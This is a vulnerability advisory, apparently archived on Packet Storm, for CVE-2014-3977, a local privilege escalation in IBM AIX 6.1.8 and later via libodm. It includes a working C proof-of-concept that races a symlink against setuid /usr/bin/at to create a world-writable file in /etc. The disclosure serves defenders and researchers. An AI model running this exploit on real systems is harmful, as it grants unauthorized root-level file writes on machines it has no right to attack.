what you don't know can hurt you

IBM AIX 6.1.8+ Privilege Escalation

IBM AIX 6.1.8+ Privilege Escalation
Posted Jun 12, 2014
Authored by Tim Brown | Site portcullis-security.com

IBM AIX versions 6.1.8 and later suffer from a local privilege escalation vulnerability in libodm due to an arbitrary file write.

tags | exploit, arbitrary, local
systems | aix
advisories | CVE-2014-3977
MD5 | 319e4008a767f106fb7dc54a17237ed2

IBM AIX 6.1.8+ Privilege Escalation

Change Mirror Download
Vulnerability title: Privilege Escalation in IBM AIX
CVE: CVE-2014-3977
Vendor: IBM
Product: AIX
Affected version: 6.1.8 and later
Fixed version: N/A
Reported by: Tim Brown

Details:

It has been identified that libodm allows privilege escalation via
arbitrary file writes with elevated privileges (utilising SetGID and
SetUID programs). The following will cause a new file /etc/pwned to be
created with permissions of rw-rw-rw:

#include <stdlib.h> #include <unistd.h> #include <stdio.h> int
pwnedflag; int main(int argc, char **argv) { pwnedflag = 0; umask(0); if
(fork()) { setenv("ODMERR", "1", 1); while (!pwnedflag) { if
(!access("/etc/pwned", F_OK)) { pwnedflag = 1; printf("Race
won...\r\n"); unsetenv("ODMERR"); exit(EXIT_SUCCESS); }
system("/usr/bin/at"); } } else { while (!pwnedflag) {
symlink("/etc/pwned", "ODMTRACE0"); if (!access("/etc/pwned", F_OK)) {
pwnedflag = 1; printf("Race won...\r\n"); exit(EXIT_SUCCESS); }
unlink("ODMTRACE0"); } } }

It is believed this is a side affect of CVE-2012-2179 being incorrectly
resolved. As understood, prior to CVE-2012-2179 being fixed, libodm
would simply open ODMTRACE0 and write to it assuming ODMERR=1. It is
believed that the fix that was applied was to check for the presence of
ODMTRACE0 and increment until no file was found. It is necessary to win
a time of check, time of use race condition by creating a symlink from
the ODMTRACE0 in the current working directory to the target file under
hoping that the link will be added after the check has been made that
ODMTRACE0 does not exist.


Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close